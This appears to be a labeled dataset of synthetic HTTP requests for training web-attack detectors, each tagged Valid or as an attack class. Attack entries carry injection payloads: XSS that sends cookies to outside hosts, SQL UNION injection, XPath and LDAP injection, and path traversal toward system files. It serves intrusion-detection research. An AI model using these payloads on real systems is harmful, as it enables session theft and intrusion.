aDsylucmi8yrglh=onatre&eeoa=;ratttpositionpositionk?E(j1RtelnetoSscript&hende9=SNnxttEdfs&di=jeformoE>&dlslrtE=8064&elurhortrte8ew=n&TpPK=nw&ftp&la7=snall&ilk0NQJJk=ir4eehomeee&Toc&rurno6tan1os='2m&l8ea=oncel&eERt=s1raoiIayao&io=weaE7eiHPunyd&7wts53iSaroji=dhmaccept

End - Id: 7969
Start - Id: 35666
class: XPathInjection
GET /p4w/eeyewrlnpDuSis1ac/0hD48.OSux5Z/i.WxuK16/lP3gnqb..asmx?tdd2aoo=eTkaurTjasirecqau6&ptczOmwiert=682&em5rtletu=8NvEoV&sy64g-jBxyVE=nvaed6rt%26rS+Eqe&srw=nhw6ngx1%27+or++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28+i++%2B++++j+++%2B++++k%2B+l++++%2B+1%29%5D++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++%27gT%27+++%3D++%27++++faWlna0j%27+++++or&e8=77498&b8gthiNta=m19rfCAH%40I_&e4=aCOa.&aogra=f&grRwxp=guRo HTTP/1.1
Host: 21.127.129.143:80
Connection: keep-alive
Accept: video/quicktime, text/*;q=0.0, video/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: awsjno-AAsy;q=0.7, oottyc-d, nherut-rmtnRlcv, O-ofiud
Cache-Control: min-fresh=57
Client-ip: 68.97.141.43
Cookie: fzmng0=3;iaV2tvd=2836674512;4d=9ei3
Cookie2: $Version="6"
Date: Sun, 16 May 04 02:24:21 CET
ETag: "e3pjb@j9ocdjkSZAayeI"
Expect: 100-continue
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Thu, 11 Nov 04 14:44:42 GMT
If-Unmodified-Since: Sat, 01 May 10 15:52:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 119
MIME-Version: 3.1
Pragma: i='3rsriePj'
Proxy-Authorization: Basic ZXRvOTpyeXJSaWk2cg==
Authorization: Basic NWd3RTpFZWFBd2FPcw==
Range: -5103
Referer: http://tsed.gov/ontm/5s1e/apbr/2ie4.aspx
TE: gzip;q=0.3
Trailer: User-Agent
User-Agent: shrbenpsI/6.3.3
UA-CPU: Sparc
UA-Disp: 464,9739,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: ienf/4.5 www.tbib.js
Transfer-Encoding: identity
Upgrade: alcth4/9.0, omen/8.5
Warning: 803 161.22.234.22 "nydhoO5peei7" "Wed, 08 Feb 06 21:10:39 CET"
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 24734
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35666
Start - Id: 46683
class: XSS
GET /i3RtB4vzk/lC3.exe?.dGpasswdhk0_tmXhome=oo%5D HTTP/1.1
Host: www.igsx.uk
Connection: keep-alive
Accept: audio/basic;q=0.3, audio/*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-age=543
Client-ip: 113.189.52.52
Cookie: ssl0deenzW=Wq;ab9Fsy=<input  type   =    "image   "   dynsrc=    "    javascript:  [alert  ('Ge3aicge9');]   " >;GcrxxA=o<isehttptimemeta;exuaxairaidSi=t-ar;lrluentnnioef8t=4
Cookie2: $Version="94"
Date: Tue, 09 Oct 07 19:48:24 CET
ETag: W/"4Mg-80aLzPHGD8aln0L"
Expect: wNio=a8ou;fxmb=9scx
From: ekionh@nouustph.biz
If-Modified-Since: Fri, 18 Nov 05 02:17:05 CET
If-Unmodified-Since: Fri, 02 Mar 07 16:16:32 CET
If-Match: "zGsUOWWOtrO9udU"
If-None-Match: *
If-Range: Sun, 14 Aug 05 10:38:32 GMT
Max-Forwards: 8
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM eW5Pb3ZhZGNzN2hzaHJyeGNTbmlzZWV0YmVydGxvcmVh
Authorization: NTLM TnRpbnNOdXJmdDh0aXNvbHNOeG5lc3dlc2FybHR1YW5oZWlyemtlZW15YmlUb3Jw
Range: 739511-11,4558-62
Referer: /Ildu/sbnte/rnmjnhef.gif
TE: chunked,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.8 (compatible; Konqueror/8.4; WinNT; svoh8onia)
UA-CPU: x86
UA-Disp: 445,3184,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 630x4242
Via: HTTP/5.9 134.189.230.91, FTP/6.5 241.178.166.146
Transfer-Encoding: identity
Upgrade: NNutal/3.3, Zdxhh/3.9
Warning: 142 198.194.142.50 "nwxrb2ahoh62t06" 
X-Forwarded-For: 36.143.183.170
X-Serial-Number: 49725305842038917
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46683
Start - Id: 12981
class: Valid
GET /KZ9Vx8VpEbodyI/wOxDersPtkUL6qxiN/2ssn3n6et6/iwtaero3netteeqlooz/DQhC0JBHtmpL/n4L2BCjZ/mtsry4fca0ioez.nsf?a3erom=%3Cw&al3wdttZoc=mtet1d&o7fzrmoaWthdeR=semRg&iehq0datTYsI=tomsRrq0yDuNnt0io&ltanYettxvh=btn HTTP/1.0
Host: www.t2ereau.biz
Connection: aseinhi
Accept: */*
Accept-Charset: iso-8859-7, x-mac-turkish;q=0.0, hz-gb-2312;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 57.159.14.47
Cookie: oajjnssiaSmnSmr=u;ds=nz;prtoei6Eso=ccentshd0e;tr=tL s lssrihd\sL
Cookie2: $Version="3"
Date: Wed, 12 Jan 05 06:58:29 UTC
ETag: "JMFUWMQ9t406M4sWAg"
Expect: 100-continue
From: picsvpm@izhyigm.biz
If-Modified-Since: Thu, 01 Dec 05 09:25:17 CET
If-Unmodified-Since: Tue, 17 Oct 06 14:32:46 GMT
If-Match: "nV4C4hNh1N4Yqysd1"
If-None-Match: *
If-Range: *
Max-Forwards: 843
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic cjdHaGVsOm9zZW5tbklv
Authorization: NTLM ZWcyYzduaXVvYXRhUGRsOXRlOWhpaXNueGFjZW90bG5oaXNidWhwNnJ5dGFu
Range: -1257,71-2411,674-
Referer: http://6vrntp6i.org/Tfseh/hehh1.php
TE: trailers,trailers
Trailer: TE
User-Agent: xee12elo
UA-CPU: MIPS
UA-Disp: 7394,680,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 752x029
Via: 2.6 www.wigE.htm
Transfer-Encoding: identity
Upgrade: iyr/1.7, i8et/9.1, hhek/1.3
Warning: 343 199.227.129.137 "wbdtdimSsnaakz" "Fri, 07 May 04 12:46:34 UTC"
X-Forwarded-For: 234.188.207.127
X-Serial-Number: 39169260132979
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12981
Start - Id: 47610
class: XSS
GET /sf/imj6Enn7tlduEO/uniono7-umail33aformky5/n61BKWdTId-I-f0FvL/mese5smeicone/tUM0DXInJem/xrcRshaolSaH/oEa/q8/hiriInvsht7cL7fyip5i/lEsd0Etu@n8vOSJE_.nsf?idlretoEaoprd=ovtl&SltmHgjll=40511&oooes=8lledelotacG&mqo-b1=thttps&evtsezd=%3Cbody+onload++%3D++++%22++++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.atns.com%2Fcgi-bin%2Feresen.cgi%27%2Bdocument.cookie%29%3B%5D++++%22++++%3E&sssAs9tteetwaL=nE%7CEeshutdownhhtpassjitcattt5ir&e1uo=2e8srntiorjgikobhN&allm=462267004&csrioewT=41149297&Y@mJ=oWT57tvEpps&aOmtixuel=6qjOz7Y6IB&d5eheQyehd=6093391&otmm6roas6begm=6ek6&ceatd=08402109 HTTP/1.1
Host: 12.137.108.95:2515
Connection: keep-alive
Accept: text/*;q=0.3, image/*, video/*
Accept-Charset: windows-1255, cp-936
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=4086
Client-ip: 254.77.17.52
Cookie: hsiiooarr=positionx;tpcoliMSk=848;bbN1nddofTe=7nAtzt;be=defiedelete;cozan2=s|Ee%;o0of5=yl7e@TDv@E
Cookie2: $Version="3"
Date: Fri, 25 May 07 16:10:27 CET
ETag: "@Xjp1ovKWikgKE4aj"
Expect: 100-continue
From: b5GeiRai@2s2t.st
If-Modified-Since: Thu, 24 Jan 08 06:18:35 GMT
If-Unmodified-Since: Mon, 19 Jan 09 20:23:26 CET
If-Match: "qtk7cuH6RqsxhVzD"
If-None-Match: *
If-Range: Mon, 15 Mar 10 15:42:41 UTC
Max-Forwards: 8
MIME-Version: 8.3
Pragma: hryrcpe=7iap
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: tl7roE r0ua199a=uE1o5
Range: 393273-
Referer: http://rcbett.biz/midrfr.php3
TE: gzip
Trailer: Expect
User-Agent: Mozilla/1.8 (X11; U; Open BSD i586 5.3; uv-la; rv:5.6.8) Gecko/32491534
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 608x141
Via: 5.5 134.39.107.235, 0.0 www.t4en.js:145
Transfer-Encoding: identity
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 19.35.93.68
X-Serial-Number: 2524902769036083814
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47610
Start - Id: 37377
class: LdapInjection
GET /h0OQ81wn/qlH9heeRAiofscT/bcet15G0zVNv9SNIgZV/pdfnkVl.sh?MePbSXU=loersa&h2e=a_JaR4ASd&j6HVVCconnectC=+tq+ HTTP/1.0
Host: www.ereql.net
Connection: keep-alive
Accept: application/*, text/*;q=0.0, audio/*
Accept-Charset: x-mac-arabic
Accept-Encoding: deflate;q=0.5, identity, compress;q=0.0
Accept-Language: ) (|(e9=ehwie*)
Cache-Control: min-fresh=7
Client-ip: 23.173.203.157
Date: Fri, 01 Oct 04 02:44:44 GMT
From: rantutaO@slU8aeire.ch
If-Modified-Since: Sat, 13 Oct 07 20:29:36 UTC
If-Unmodified-Since: Sun, 14 Mar 10 06:11:29 CET
If-Match: *
If-None-Match: "VVvBUv-i4FJgbqLUyJHD"
If-Range: *
Max-Forwards: 289
MIME-Version: 0.7
Pragma: h='ag55'
Proxy-Authorization: NTLM cE1xbFZzSXJnb2V2N2FlYWVvb2FydG9qMjJMZDVnbjFxcg==
Authorization: Basic cmh6N3p1OmFobndoVg==
Range: 059445-,841-
Referer: http://www.fqee.org/2EUeybmh/aR1hyen/Iwegssun.asp
TE: trailers
User-Agent: S1i1st (oQWnBigF6; d0S9i-8)
UA-OS: Windows 95
Via: 1.6 www.ieea.shtml, HTTP/3.5 www.nuSa.js:24, 9.8 www.zronyptO.gif:7
Transfer-Encoding: gzip
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37377
Start - Id: 37851
class: LdapInjection
GET /fq6WFt5/boehtaHtsicstgoonweT/yN2esrm/@FI.N-TNki/samu/nfhy6l.php?pytEptrjbfeaia=txp_ec1esqf7np&ce=3onL2&6W5AIAwq=e3s%29%28%26%28objectClass+%3Dyn*%29 HTTP/1.0
Host: www.ail0kul.uk:80
Connection: close
Accept: text/*, text/*;q=0.3, video/mpeg;q=0.1
Accept-Charset: x-mac-greek;q=0.2, utf-7, iso-2022-kr, iso-8859-9
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 177.246.9.242
Cookie: thusritt=objectilicaetc+h;7sp=48
Cookie2: $Version="737"
Date: Tue, 08 Jul 08 22:36:41 CET
ETag: "5zNxKaSEcACZS8Il5w"
Expect: dhfasa=tehi4Sz;l9ae
From: dxmog@eeOtwtfr.com
If-Modified-Since: Thu, 25 Mar 04 18:39:44 GMT
If-Unmodified-Since: Wed, 30 Jan 08 18:20:54 GMT
If-Match: *
If-None-Match: *
If-Range: "lztkpF4YPK-N_XC"
Max-Forwards: 60
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM emh5cDRTbWlJb2U3anRzeXJkOW9pY3NiOWhhYWQ0aXNldA==
Authorization: NTLM ZUVydnJlZWVpb3YzcnJyamVydElkYW80bm9kZWVvaXc=
Range: 853418-,-430
Referer: /ltekrer/6Eji/dc3ucE.jpeg
TE: chunked,trailers
Trailer: Referer
User-Agent: nglzZYwB http://www.oiost.de
UA-CPU: x86
UA-Disp: 780,4386,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 878x215
Via: 4.3 198.154.35.115, 8.2 67.23.2.79, 5.9 254.55.179.110
Transfer-Encoding: Th4t; 5ear=i8mtccy
Upgrade: uoE/5.1, iitjl/6.0
Warning: 381 69.182.116.155 "Nlsokote2jdearNL" "Fri, 14 Nov 08 18:53:43 CET"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37851
Start - Id: 45840
class: PathTransversal
GET /xnLOIV/aWSRV/lbyTcP9EZ5B85frL_GC/twhereNAGqZ.sn/tbaatae.htm?srtsmhmfHjcg=167301640&ifwNedM3c7ahe=..........................WINNTsystem.ini HTTP/1.1
Host: www.9uyaoo.fr
Connection: keep-alive
Accept: application/*, text/*
Accept-Charset: *
Accept-Encoding: compress, identity, identity;q=0.3
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 145.76.47.201
Cookie: Vgtmptpwety=enyiEAx2fe;meseLbhlrF1g=02106;aPax= ezea'lEc&a$e
Cookie2: $Version="84"
Date: Fri, 20 Jun 08 06:13:56 GMT
ETag: "w2vPLptRFBMbnkB@"
Expect: crmd2me
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Sun, 06 Aug 06 08:42:43 UTC
If-Unmodified-Since: Thu, 15 Sep 05 05:10:13 UTC
If-Match: *
If-None-Match: "zXW-D.D90nzMt8qQ"
If-Range: *
Max-Forwards: 75
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: NTLM TmVsbzhpNWJ5b0hpaGRyaFJlZXRpZW1zbklsZDlUY00=
Range: 321-0
Referer: http://www.aiooodr.it/ins1/5ets3is/7iaarAE/ruad.msf
TE: gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: y1og5-6 http://www.ribfy.net
UA-CPU: Sparc
UA-Disp: 7854,570,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 861x425
Via: 9.8 245.231.3.126, 7.5 www.asb3t.jpg:55428
Transfer-Encoding: deflate
Upgrade: inw5/1.5, wwesr/8.9, 5rte/1.6, d8hhli/8.3
Warning: 146 143.244.193.232 "tjezxosaoyuieeityv" 
X-Serial-Number: 25397478987579
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45840
Start - Id: 13895
class: Valid
GET /egne65t/edkassob6i/gr3azoiplu/0@/xGe@8o/yh/nVwSwQ7_wh6CuaV2/BuPYU2TGIEJ/sERn2/f_gftp7dexmlLGV/bEZO.htm?gSneru2nliiewmt=Rr2ermcscript5exp_&inZr1guttem=stdlemchs&ioc3dahoihe=Atmks&ahcoWgFersct=efeAb7at1oTDcIrnA&xaDrhah=teiROUceia+&1isiiierep24m=31091877 HTTP/1.1
Host: 30.92.169.61
Connection: keep-alive
Accept: text/xml
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-age=35716
Client-ip: 158.245.114.113
Cookie: soenvoeasoteyab=ryH0phto;ukAafevs=n4Py;o8EsactmDe3=);insertcmddTzmAD=28;nooi=11571
Cookie2: $Version="602"
Date: Tue, 28 Mar 06 08:40:37 UTC
ETag: "vZfOTTbwicbYW0DedDv"
Expect: 100-continue
From: mshmtny@eieiosii.fr
If-Modified-Since: Fri, 31 Aug 07 13:32:32 CET
If-Unmodified-Since: Sat, 02 Jan 10 04:16:51 CET
If-Match: "pl_@_qgoMAbItrNN5"
If-None-Match: *
If-Range: *
Max-Forwards: 915
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest username="oa1hT"
Authorization: Basic aWlpNGE6VURvZXQ=
Range: 914-
Referer: http://n8to.gov/oionx/ucnos/Vne7nl/uovOhrEt/Panehaub.pl
TE: trailers,gzip,trailers
Trailer: Range
User-Agent: anEro4meypa0
UA-CPU: Sparc
UA-Disp: 215,5211,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7739x7906
Via: 7.8 www.titamn.gif, HTTP/1.9 www.t1ms.html, 3.0 www.tlrur.jpeg
Transfer-Encoding: ctmr7
Upgrade: ujteh/5.0, sh2/9.2, nct9Z/8.1
Warning: 289 117.168.162.177:92470 "leeeIdEeemiettoeetPe" 
X-Forwarded-For: 150.165.127.46
X-Serial-Number: 02052575004924
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13895
Start - Id: 42084
class: SqlInjection
GET /isymewme/aG7JD@UH/7lRr8oHAv/guOdtdp8yZhv4-UNYM/uQIVB/ceo/Y4group byVPSOc.mspx?qXrexecR5iBD--T=%27++++%29+UNION+ALL+SELECT++++4560++++FROM++hell+WHERE+++%28+%27%27+%3D+%27&ttit0ee=s6Tec6r0sd4eahs HTTP/1.1
Host: www.ereee.uk
Connection: Scach
Accept: */*
Accept-Charset: isiri-3342;q=0.7, x-mac-arabic;q=0.9, euc-tw;q=0.2
Accept-Encoding: 
Accept-Language: 2lna-cn;q=0.2, tx6enEi-sShsk;q=0.7, atise-muPv, 6s-oStcecm;q=0.3
Cache-Control: max-stale
Client-ip: 183.141.254.90
Cookie: al=xgna6@%7 ;ploJa0yjHr=lsj T;iEbrrrio=hT l;lsaiw3d5=45092
Cookie2: $Version="34"
Date: Sat, 18 Aug 07 17:31:31 GMT
ETag: "m0e.RyTZWMInQHe"
Expect: 100-continue
From: amm24r@w2uiwd.st
If-Modified-Since: Fri, 31 Dec 04 14:30:27 CET
If-Unmodified-Since: Tue, 11 Mar 08 20:23:34 GMT
If-Match: *
If-None-Match: "CBdoAIx1Iol5FHJG"
If-Range: Sat, 26 Jul 08 01:22:03 CET
Max-Forwards: 1312
MIME-Version: 0.9
Pragma: eso=n
Proxy-Authorization: NTLM VGFlZHBlN3lzdDM4RWV0aWJsaGlhYWJoc2ZvdFd1aWVTZWxi
Authorization: Basic ZW5oYzpkb2xlZWVh
Range: -951
Referer: /heetl/8tefq/nias/ctepiR.mpg
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.1 (Windows; U; Win98 9.2; Hf-sN; rv:3.4.2) Gecko/56803248
UA-CPU: x86
UA-Disp: 7502,392,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 861x9768
Via: 7.4 www.trrsilt.gif, 9.3 www.cIefl.jpeg:40
Transfer-Encoding: compress
Upgrade: a3r/9.3, rhiho/2.1, tse/5.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42084
Start - Id: 16656
class: Valid
GET /s8nT-VU7/T1AnsamnnStseaeaur/gshltfiearafmntds/t1rrandcG7HmO/nBO_r@esBzxF-omBS/amehdhliio5/AapqiKcrhoatshqnntm.cgi?ndrApDaihAJ1=t8looupdeejl&ivLmz9=3975&l8@m=ec%25u&mtnnounaOrwodb=255317&tNBhCcityye=hELMFwO&nehi=966474070&Enb-H@xvyY=Ncea HTTP/1.1
Host: 222.143.139.248
Connection: He2oryr
Accept: */*;q=0.7
Accept-Charset: x-mac-korean
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 255.93.106.203
Cookie: 5r=hre;Rs=sbyo7eoi
Cookie2: $Version="13"
Date: Sat, 13 May 06 03:21:50 UTC
ETag: W/"ZRksEfMqur5e244Egpfk"
Expect: 100-continue
From: sieqCi@mzS0qae.it
If-Modified-Since: Mon, 22 Jan 07 08:17:09 CET
If-Unmodified-Since: Thu, 06 Mar 08 04:38:13 CET
If-Match: *
If-None-Match: "gP7HElrwBsLM.Ho"
If-Range: Sat, 29 Sep 07 06:46:47 CET
Max-Forwards: 42
MIME-Version: 3.7
Pragma: 1=ldp
Proxy-Authorization: NTLM dWV1ZXNpcmFzYmxsYjN0dnR6d21SdXRsZHRpaWV0bGFobGF1Z29x
Authorization: de8xH Amxs5=Berma
Range: -085,-96748
Referer: http://8cwte.be/tutfse.js
TE: chunked;q=0.6
Trailer: Warning
User-Agent: udsH8wE
UA-CPU: x86
UA-Disp: 950,9201,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5729x0287
Via: FTP/6.4 215.105.111.240, HTTP/3.5 6.91.177.80, 6.8 www.edch.css:3937
Transfer-Encoding: compress
Upgrade: ombmMg/6.7
Warning: 890 www.nUiou.jpeg "oe52aLer" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6793102
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16656
Start - Id: 49868
class: XPathInjection
GET /iltetEo212e6tctrue/lnnofdrtmGadLsheLr/8Fvbscript/Aoa4ywHTFhtpassfCQ/nwuvMM968poRZB@T/eC1VKoqk4otYc5h/sb/teAti1tL/h2FjCS-6s7laDoS.S/iemh/Mt3h10m.png?mrusO9kr=oEI1dXJ7VN%40&maxlrnra=ozynrdt&MkHlswdv=tyJlmNM&tWxnssue=64&kFB1S@XTfn9=uz%27++++or+++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28++i+++%2B+++j+++%2B++++k+%2Bl+%2B+++1%29%5D++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++%27egi%27++++%3D++++%27++++eelTo%27++or&abeo8cf=+rEnrm&lmari=f&itcl=ehcyh&naotifecoefoa=Prv2ad&eojocws2qj4Eww=ml6 HTTP/1.1
Host: 40.237.66.231
Connection: keep-alive
Accept: */*
Accept-Charset: utf-7;q=0.3, cp-936;q=0.8, x-mac-ce;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: U-l8, tqwtb-Etsdw
Cache-Control: no-store
Client-ip: 119.142.72.137
Cookie: QAfP238includePnode= mtk 0etc;gs=oat;uBoZAlhavingJ=frsilbreoeR;SmmidDiss5iy1ya=plOe?rli0swget?s+r~s;w7it80vboot.iniMmhK=ah&sosinputu e8R9;ir0zmreilE=es$eo 
Cookie2: $Version="5"
Date: Sat, 20 Mar 04 16:44:02 CET
ETag: "xcInQ_66Zglzx9B"
Expect: lbaehdv
From: eslc7@67owp.net
If-Modified-Since: Sat, 14 Jul 07 07:52:09 UTC
If-Unmodified-Since: Thu, 28 May 09 03:12:12 UTC
If-Match: *
If-None-Match: "g-HRA_Dm5Sy3__Ip"
If-Range: "3oI85smExYicW8c7yHH_"
Max-Forwards: 09
MIME-Version: 4.0
Pragma: str='estaal'
Proxy-Authorization: Basic ZWVic2FsVDp0c2VyZQ==
Authorization: NTLM ZWVqV3N1OWVUYXJxc3puaXFzUmJlaWExZHRldG5maXR4ZTF0ZQ==
Range: 40331-8,658595-,136-
Referer: http://www.dgn9zt6.be/e4uCE/alptsieU/ewja.gz
TE: trailers
Trailer: Accept-Encoding
User-Agent: rBZCy0N04r http://www.eu9imne.org
UA-CPU: x86
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: 4.7 238.5.116.239
Transfer-Encoding: gzip
Upgrade: hiv/6.0, 8geb/7.6, ssu82v/5.0
Warning: 968 www.Iurrcesn.jpg "rFd4tdex5ohayei4iC" "Wed, 21 Nov 07 23:43:23 CET"
X-Forwarded-For: 24.251.121.187
X-Serial-Number: 5095784293385
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49868
Start - Id: 11802
class: Valid
GET /oi/nAceu8e/Uf_PNHU3x5group by.pl?prt=e&asr=+7kncl+Dopto4includeJhqeetclli&tia=dt%3Ain%3Es5sagcopyayurmo+ac&ey=05&ngnvyae=02701246&6cE0Oauhte=ja&eSTinairlaw=56248005&dldmkiDhel=782099 HTTP/1.1
Host: www.Nnoc4efu.uk
Connection: keep-alive
Accept: application/rtf, audio/x-wav;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 199.123.97.198
Cookie: ilhh=@SsamcalI;juwtiha=43;hhicnIRoclc=[nue;Namipao=879;ner=o3riclehtn2ox;snta=02350023
Cookie2: $Version="32"
Date: Fri, 17 Sep 04 07:34:50 CET
ETag: W/"ZeJ8TfQVgaHJzfekAU4L"
Expect: 100-continue
From: tnsjx@nvlaoadtiu.st
If-Modified-Since: Thu, 03 Jun 04 18:07:32 GMT
If-Unmodified-Since: Fri, 21 Sep 07 10:10:15 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 12 Jul 05 08:14:27 CET
Max-Forwards: 11
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bnRtd3MwZXdzcHBUdGFlcmV0ZXpvbmVFRGVmYW9nb2phTmxybWllb3E1NUk=
Authorization: Digest cnonce="ipEs"
Range: 0942-
Referer: http://ta6T.fr/eaeduego/yrwehe3u/m8aEe/mebic.tiff
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.6 (compatible; Konqueror/3.6; Win 9x; fxw1)
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0954x9922
Via: 6.8 www.eoi4ui.html
Transfer-Encoding: gzip
Upgrade: meE/0.7
Warning: 125 www.knwtlae.shtml "ad0et9kU3d4n6SuMdtN" "Thu, 30 Sep 04 09:26:08 GMT"
X-Forwarded-For: 92.235.100.67
X-Serial-Number: 18749
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11802
Start - Id: 47110
class: XSS
GET /av/ptrlb/uYwF/hOHVfpihEWsgZG71-/9yugtoeautuvta/bBd33hiHRx/oTlR7oMG/KQcWaccess_log4FH/otea0ranmians/Nebd8gnr.exe?mdhFtakse=AautoexecdE%3Dortrhbgsound%24od3mel&hazmyeuRaev=%3Ca+++href%3D+++%22+about%3A%3Cs%26%2399%3Bript++++%3E%5Bwindow.open%28%27http%3A%2F%2F118.201.5.53%2Forra.dll%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E+++%22+%3E HTTP/1.0
Host: 1.97.28.119:80
Connection: keep-alive
Accept: image/*;q=0.5
Accept-Charset: x-mac-korean;q=0.2, iso-8859-2
Accept-Encoding: *;q=0.1
Accept-Language: tseEi-m, bi8aot-zn17eLa, s-c
Cache-Control: no-store
Client-ip: 34.0.35.96
Cookie: tet2SGw=t3-28-x7ToX;dhdscieeF2rt=thh
Cookie2: $Version="0"
Date: Mon, 10 Dec 07 16:41:55 GMT
ETag: "vnU_@_vYPqXRe-uJcMr"
Expect: 100-continue
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Sat, 11 Apr 09 06:35:13 GMT
If-Unmodified-Since: Fri, 15 Apr 05 03:17:26 UTC
If-Match: "rkz2rxWR7@GyKnYNtt"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 7.3
Pragma: so='nr2r'
Proxy-Authorization: NTLM Z0VhaGFlc29hbWhuZWhkSG9sbkx0bGxvbnRjZnJvc2x1dDk1bnByaGxvaHI0cDY=
Authorization: Basic aW9JRDphZXRzNXJ0dA==
Range: 74-7756,9-
Referer: /urth/Rs5noot/teahogei/aJo0ti/eTbxhyqc.pdf
TE: gzip;q=0.3,gzip;q=0.5
Trailer: Connection
User-Agent: lp@FGTr http://www.domebthb.it
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7372x166
Via: snlss/2.1 243.136.217.68
Transfer-Encoding: identity
Upgrade: mnyt/9.5
Warning: 241 140.186.56.188 "eynAOe7ebztnrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47110
Start - Id: 23112
class: Valid
GET /wiS1uieuefinHin/sbf3Qgwtwhere/h8VPu/TqGqiuH/hv.jpg?cnAeeihlaar=92107&5Mno2tep=otoE7mbheN&NUat7z=svftn&aux8gag=b+pyp&zteteEshd=stdinn%5Duw%2Bn42s&positionpU5k@AZmj=+5cu&ag=qisb2%28cem%3Abeg&a0ytmp5R9F9o=doba&ows=6f&7hso8mtnunEo7e=h HTTP/1.1
Host: 223.249.167.84:732
Connection: eiahri3M
Accept: */*
Accept-Charset: koi8-r;q=0.6, big5, gb2312
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=72455
Client-ip: 64.33.164.229
Cookie: et=17557283;vKN4s-JI0=57546068;6oSeTurhflRit=7684019
Cookie2: $Version="092"
Date: Thu, 18 Jan 07 13:41:48 GMT
ETag: W/"t15mmUNACPbF9yvF1h8d"
Expect: npeo
From: Hocan@osthutarg1.biz
